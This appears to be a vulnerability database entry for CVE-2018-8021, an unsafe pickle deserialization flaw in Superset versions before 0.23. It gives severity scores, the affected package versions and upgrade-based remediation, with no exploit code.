CVE-2018-8021
Deserialization of Untrusted Data in superset
9.8
CRITICAL
CVSS 3.1
EPSS 64.3%
Description
Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.
How to fix CVE-2018-8021
To remediate CVE-2018-8021, upgrade the affected package to a fixed version below.
- PyPI/superset—upgrade to 0.23 or later
- —upgrade to 0.23.0 or later
Is CVE-2018-8021 being exploited?
Likely — EPSS is 64.3%, placing CVE-2018-8021 in the top tier of vulnerabilities by exploitation probability. Prioritise patching.
Affected packages (2)
- from 0, < 0.23
- from 0, < 0.23.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |